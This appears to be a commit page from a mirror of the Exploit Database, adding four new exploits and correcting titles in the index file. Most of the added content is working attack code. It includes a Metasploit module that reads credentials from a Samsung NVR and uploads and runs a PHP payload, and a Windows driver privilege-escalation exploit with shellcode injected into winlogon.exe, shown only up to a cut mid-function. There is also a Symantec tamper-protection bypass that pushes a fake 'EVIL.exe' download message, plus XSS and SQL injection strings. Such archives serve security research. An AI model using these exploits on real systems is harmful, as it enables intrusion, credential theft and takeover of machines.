bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-11-14

Browse source 
4 new exploits

Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)
Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass
IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation

IBM Websphere 6.0 - Faultactor Cross-Site Scripting
IBM Websphere 6.0 - 'Faultactor' Cross-Site Scripting

Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection
Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL Injection

MemHT Portal 4.0.1 - SQL Injection Code Execution
MemHT Portal 4.0.1 - SQL Injection / Code Execution

AWCM 2.1 final - Remote File Inclusion
AWCM 2.1 Final - Remote File Inclusion

Invision Power Board 3 - search_app SQL Injection
Invision Power Board 3 - 'search_app' SQL Injection

PHP-Nuke 7.x - Content Filtering Byapss
PHP-Nuke 7.x - Content Filtering Bypass

Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload
This commit is contained in:
Offensive Security 2017-11-14 05:01:29 +00:00
parent 43f3d9e94c
commit 9e4de03a13
12 changed files with 725 additions and 18 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -5729,6 +5729,7 @@ id,file,description,date,author,platform,type,port
43119,platforms/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,hardware,dos,0
43120,platforms/windows/dos/43120.txt,"Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,windows,dos,0
43124,platforms/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,windows,dos,0
43135,platforms/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9320,6 +9321,8 @@ id,file,description,date,author,platform,type,port
43104,platforms/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local,0
43109,platforms/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local,0
43127,platforms/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",linux,local,0
43134,platforms/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,windows,local,0
43139,platforms/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation",2017-11-13,"Parvez Anwar",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -14168,7 +14171,7 @@ id,file,description,date,author,platform,type,port
28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0
28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow (Metasploit)",2013-10-15,Metasploit,windows,remote,0
28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)",2013-10-15,Metasploit,windows,remote,0
28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0
28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - 'Faultactor' Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0
28987,platforms/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,multiple,remote,0
29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0
29033,platforms/linux/remote/29033.html,"Links_ ELinks 'smbclient' - Remote Command Execution",2006-11-18,"Teemu Salmela",linux,remote,0
@ -16779,7 +16782,7 @@ id,file,description,date,author,platform,type,port
1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,php,webapps,0
1312,platforms/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution",2005-11-10,rgod,php,webapps,0
1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0
1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0
1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0
1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps,0
1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,php,webapps,0
1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php?id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0
@ -20770,7 +20773,7 @@ id,file,description,date,author,platform,type,port
7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0
7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0
7113,platforms/php/webapps/7113.txt,"BandSite CMS 1.1.4 - Insecure Cookie Handling",2008-11-13,Stack,php,webapps,0
7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection Code Execution",2008-11-13,Ams,php,webapps,0
7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection / Code Execution",2008-11-13,Ams,php,webapps,0
7116,platforms/php/webapps/7116.txt,"Alstrasoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps,0
7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0
7118,platforms/php/webapps/7118.txt,"TurnkeyForms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,php,webapps,0
@ -24954,10 +24957,10 @@ id,file,description,date,author,platform,type,port
15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0
15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0
15510,platforms/php/webapps/15510.txt,"AWCM 2.1 Final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0
15512,platforms/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0
15513,platforms/php/webapps/15513.txt,"WordPress Plugin Event Registration 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0
15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - 'search_app' SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0
15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
15518,platforms/php/webapps/15518.txt,"Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
@ -29353,7 +29356,7 @@ id,file,description,date,author,platform,type,port
26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0
26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0
26815,platforms/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps,0
26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Byapss",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0
26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Bypass",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0
26818,platforms/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,php,webapps,0
26819,platforms/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,php,webapps,0
26820,platforms/asp/webapps/26820.txt,"ASP-DEV XM Forum - 'forum.asp' Cross-Site Scripting",2005-12-14,Dj_Eyes,asp,webapps,0
@ -38820,3 +38823,4 @@ id,file,description,date,author,platform,type,port
43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0
43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090
43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0

Can't render this file because it is too large.

2
platforms/multiple/remote/28981.txt
View file

@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the
WebSphere Application Server 6 is vulnerable; other versions may also be affected.
GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1
GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1

2
platforms/php/webapps/1317.py
View file

@ -62,4 +62,4 @@ passwd=conf[:conf.find("'")]
print '[+]Exploit Succeed'
print '[+]User :', user, 'Pass :', passwd
# milw0rm.com [2005-11-13]
# milw0rm.com [2005-11-13]

5
platforms/php/webapps/15510.txt
View file

@ -12,7 +12,4 @@ http://sourceforge.net/projects/awcm/files/
[+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetings:  No Greet  !_!
Greetings:  No Greet  !_!

2
platforms/php/webapps/15515.txt
View file

@ -9,4 +9,4 @@
The vulnerability is in the file search.php, the variable search_app is vulnerable.An attacker can exploit this to find out the rootpath of website or for Blind SQLi attack.
-Google Dork: inurl:index.php?app=core
-Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]=
-Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]=

4
platforms/php/webapps/26817.txt
View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/15855/info
source: http://www.securityfocus.com/bid/15855/info
PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
@ -12,4 +12,4 @@ Insert:
URI:
http://www.example.com/[DIR]//modules.php?name=Web_Links
Insert:
<iframe src=http://www.example.com?phpnuke79 <
<iframe src=http://www.example.com?phpnuke79 <

4
platforms/php/webapps/38688.txt
View file

@ -1,4 +1,4 @@
[+] Credits: hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
@ -151,4 +151,4 @@ The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
by hyp3rlinx

249
platforms/php/webapps/43138.rb Executable file
View file

@ -0,0 +1,249 @@
# Exploit Title: Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D
# Date: 2017-06-19
# Exploit Author: Omar MEZRAG - 0xFFFFFF / www.realistic-security.com
# Vendor Homepage: https://www.hanwhasecurity.com
# Version: Web Viewer 1.0.0.193 on Samsung SRN-1670D
# Tested on: Web Viewer 1.0.0.193
# CVE : CVE-2017-16524
##
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'digest'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Samsung SRN-1670D - Web Viewer Version 1.0.0.193 Arbitrary File Read & Upload',
'Description' => %q{
This module exploits an Unrestricted file upload vulnerability in
Web Viewer 1.0.0.193 on Samsung SRN-1670D devices: 'network_ssl_upload.php'
allows remote authenticated attackers to upload and execute arbitrary
PHP code via a filename with a .php extension, which is then accessed via a
direct request to the file in the upload/ directory.
To authenticate for this attack, one can obtain web-interface credentials
in cleartext by leveraging the existing Local File Read Vulnerability
referenced as CVE-2015-8279, which allows remote attackers to read the
web interface credentials via a request for the
cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.
},
'Author' => [
'Omar Mezrag <omar.mezrag@realistic-security.com>', # @_0xFFFFFF
'Realistic Security',
'Algeria'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-16524' ],
[ 'URL', 'https://github.com/realistic-security/CVE-2017-16524' ],
[ 'CVE', '2015-8279' ],
[ 'URL', 'http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html' ]
],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
['Samsung SRN-1670D == 1.0.0.193', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 14 2017'
))
register_options(
[
OptString.new('RHOST', [ true, 'The target address.' ]),
OptString.new('RPORT', [ true, 'The target port (TCP).', '80' ]),
])
end
def check
#
print_status('Checking version...')
resp = send_request_cgi({
'uri' => "/index",
'version' => '1.1',
'method' => 'GET',
'headers' =>
{
'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
}
})
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
# <!--------------------------------- File Version 1.0.0.193 --------------------------------->
version = nil
if resp and resp.code == 200 and resp.body.match(/Web Viewer for Samsung NVR/)
if resp.body =~ /File Version (\d+\.\d+\.\d+\.\d+)/
version = $1
if version == '1.0.0.193'
print_good "Found vesrion: #{version}"
return Exploit::CheckCode::Appears
end
end
end
Exploit::CheckCode::Safe
end
def exploit
print_status('Obtaining credentails...')
resp = send_request_cgi({
'uri' => "/cslog_export.php",
'version' => '1.1',
'method' => 'GET',
'vars_get'=>
{
'path' => '/root/php_modules/lighttpd/sbin/userpw',
'file' => 'foo'
},
'headers' =>
{
'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
}
})
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
if resp and resp.code == 200 and resp.body !~ /Authentication is failed/ and resp.body !~ /File not found/
username = resp.body.split(':')[0]
password = resp.body.split(':')[1].gsub("\n",'')
print_good "Credentials obtained successfully: #{username}:#{password}"
data1 = Rex::Text.encode_base64("#{username}")
data2 = Digest::SHA256.hexdigest("#{password}")
randfloat = Random.new
data3 = randfloat.rand(0.9)
data4 = data3
print_status('Logging...')
resp = send_request_cgi({
'uri' => "/login",
'version' => '1.1',
'method' => 'POST',
'vars_post'=>
{
'data1' => data1,
'data2' => data2,
'data3' => data3,
'data4' => data4
},
'headers' =>
{
'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
'DNT' => "1",
'Cookie' => "IESEVEN=1"
}
})
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
if resp and resp.code == 200 and resp.body !~ /ID incorrecte/ and resp.body =~ /setCookie\('NVR_DATA1/
print_good('Authentication Succeeded')
nvr_d1 = $1 if resp.body =~ /setCookie\('NVR_DATA1', '(\d\.\d+)'/
nvr_d2 = $1 if resp.body =~ /setCookie\('NVR_DATA2', '(\d+)'/
nvr_d3 = $1 if resp.body =~ /setCookie\('NVR_DATA3', '(0x\h\h)'/
nvr_d4 = $1 if resp.body =~ /setCookie\('NVR_DATA4', '(0x\h\h)'/
nvr_d7 = $1 if resp.body =~ /setCookie\('NVR_DATA7', '(\d)'/
nvr_d8 = $1 if resp.body =~ /setCookie\('NVR_DATA8', '(\d)'/
nvr_d9 = $1 if resp.body =~ /setCookie\('NVR_DATA9', '(0x\h\h)'/
cookie = "IESEVEN=1; NVR_DATA1=#{nvr_d1}; NVR_DATA2=#{nvr_d2}; NVR_DATA3=#{nvr_d3}; NVR_DATA4=#{nvr_d4}; NVR_DATA7=#{nvr_d7}; NVR_DATA8=#{nvr_d8}; NVR_DATA9=#{nvr_d9}"
payload_name = "#{rand_text_alpha(8)}.php"
print_status("Generating payload[ #{payload_name} ]...")
php_payload = get_write_exec_payload(:unlink_self=>true)
print_status('Uploading payload...')
data = Rex::MIME::Message.new
data.add_part("2", nil, nil, 'form-data; name="is_apply"')
data.add_part("1", nil, nil, 'form-data; name="isInstall"')
data.add_part("0", nil, nil, 'form-data; name="isCertFlag"')
data.add_part(php_payload, 'application/x-httpd-php', nil, "form-data; name=\"attachFile\"; filename=\"#{payload_name}\"")
post_data = data.to_s
resp = send_request_cgi({
'uri' => normalize_uri('/network_ssl_upload.php'),
'method' => 'POST',
'vars_get' =>
{
'lang' => 'en'
},
'headers' =>
{
'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => cookie,
'data' => post_data
})
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
if resp and resp.code == 200
print_status('Executing payload...')
upload_uri = normalize_uri("/upload/" + payload_name)
send_request_cgi({
'uri' => upload_uri,
'method' => 'GET'
},5)
unless resp
print_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
if resp and resp.code != 200
print_error("Failed to upload")
end
else
print_error("Failed to upload")
end
else
print_error("Authentication failed")
end
else
print_error "Error obtaining credentails"
end
end
end

2
platforms/php/webapps/7114.txt
View file

@ -152,4 +152,4 @@ sub usage {
exit;
}
# milw0rm.com [2008-11-13]
# milw0rm.com [2008-11-13]

38
platforms/windows/dos/43135.py Executable file
View file

@ -0,0 +1,38 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Xlight FTP Server (x86/x64) - Buffer Overflow Crash (PoC)
# Date: 07-11-2017
# Vulnerable Software: Xlight FTP Server v3.8.8.5 (x86/x64)
# Vendor Homepage: http://www.xlightftpd.com/
# Version: v3.8.8.5 (x86/x64)
# Software Link: http://www.xlightftpd.com/download/
# Tested On: Windows 7 x64
#
#
# PoC: generate crash.txt, copy contents to clipboard, paste in any of the vulnerable fields
#
# 1. Generate crash.txt, open, and copy contents to clipboard
# 2. In Xlight Server, open Global Options > Log > Session Log - Advanced Options > Setup
# 3. Select Filtering log by users > Setup
# 4. Add User
# 5. Paste crash.txt contents
# 6. Application crashes
#
# Additional vulnerable fields:
# Global Options > Log > Session Log - Advanced Options > Setup > Filtering log by groups > Setup > Add Group
# Virtual Server > Modify Virtual Server Configuration > Advanced > Misc > Execute a program after user logged in > Setup
#
#
file="crash.txt"
#file="crash64.txt"
crash = "A"*260 #crashes on 260 for x86, but more will do
#crash64 = "A"*272 #crashes on 272 for x64, but more will do
writeFile = open (file, "w")
writeFile.write( crash )
#writeFile.write( crash64 )
writeFile.close()

142
platforms/windows/local/43134.c Executable file
View file

@ -0,0 +1,142 @@
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
=======
www.symantec.com
Product:
===========
Symantec Endpoint Protection
v12.1.6 (12.1 RU6 MP5)
Symantec 12.1.7004.6500
Vulnerability Type:
===================
Tamper-Protection Bypass
Denial Of Service / Message Spoof
CVE Reference:
==============
CVE-2017-6331
SSG16-041
Security Issue:
================
Symantec Endpoint Protection (SEP), does not validate where WinAPI messages comes from (lack of UIPI).
Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to close
the SEP UI denying end user ability to scan / run the EP AntiVirus protection. Spoofed messages could
also potentially inform a user a scan was clean.
Unfortunately Symantecs advisory left out details of the Denial Of Service as well as minimizing the
amount of text a malware could inject into the UI which would result in compromising the integrity of the
Symantec Endpoint Protection Control Panel user interface.
References:
===========
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20171106_00
Exploit/POC:
=============
1) Compile below C program, it targets various components of SEP, comment out what you want to send to the UI.
2) Try to open the Symantec Endpoint UI and you will be denied.
3) Or inject attacker supplied messages intructing the user the file is clean etc.
#include <windows.h>
#include <Tlhelp32.h>
#define VICTIM "DevViewer.exe"
//By HYP3RLINX
//ISR: ApparitionSec
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7
//How: FindWindow / SendMessage Win32 API
//Impact: DOS / Integrity Compromised
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.
void main(void){
while(1){
HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
if(hWnd!=NULL){
//This injects arbitrary messages to SEP UI.
SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***");
//This prevents a user from being able to run AV scans and renders SEP UI useless
//SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
}
//HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
HWND x = FindWindow(NULL, TEXT("DevViewer"));
if(x!=NULL){
SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
}
HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
if(x!=NULL){
SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
}
sleep(1);
}
}
Network Access:
===============
Local
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: July 8, 2016
Vendor acknowledged: 7/14/16
Vendor advisory : November 6, 2017
November 10, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

277
platforms/windows/local/43139.c Executable file
View file

@ -0,0 +1,277 @@
/*
Exploit Title - IKARUS anti.virus Arbitrary Write Privilege Escalation
Date - 13th November 2017
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.ikarussecurity.com/
Tested Version - 2.16.7
Driver Version - 0.18780.0.0 - ntguard_x64.sys
Tested on OS - 64bit Windows 7 and Windows 10 (1709)
CVE ID - CVE-2017-14961
Vendor fix url - Soon to be released
Fixed Version - 2.16.18
Fixed driver ver - 0.43.0.0
Check blogpost for details:
https://www.greyhathacker.net/?p=995
*/
#include <stdio.h>
#include <windows.h>
#include <TlHelp32.h>
#pragma comment(lib,"advapi32.lib")
#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
typedef unsigned __int64 QWORD;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
QWORD Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
DWORD getProcessId(char* process)
{
HANDLE hSnapShot;
PROCESSENTRY32 pe32;
DWORD pid;
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapShot == INVALID_HANDLE_VALUE)
{
printf("\n[-] Failed to create handle CreateToolhelp32Snapshot()\n\n");
return -1;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapShot, &pe32) == FALSE)
{
printf("\n[-] Failed to call Process32First()\n\n");
return -1;
}
do
{
if (stricmp(pe32.szExeFile, process) == 0)
{
pid = pe32.th32ProcessID;
return pid;
}
} while (Process32Next(hSnapShot, &pe32));
CloseHandle(hSnapShot);
return 0;
}
int spawnShell()
{
// windows/x64/exec - 275 bytes http://www.metasploit.com
// VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, CMD=cmd.exe
char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
char* process = "winlogon.exe";
DWORD pid;
HANDLE hProcess;
HANDLE hThread;
LPVOID ptrtomem;
pid = getProcessId(process);
if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)) == NULL)
{
printf("\n[-] Unable to open %s process\n\n", process);
return -1;
}
printf("\n[+] Opened %s process pid=%d with PROCESS_ALL_ACCESS rights", process, pid);
if ((ptrtomem = VirtualAllocEx(hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)) == NULL)
{
printf("\n[-] Unable to allocate memory in target process\n\n");
return -1;
}
printf("\n[+] Memory allocated at address 0x%p", ptrtomem);
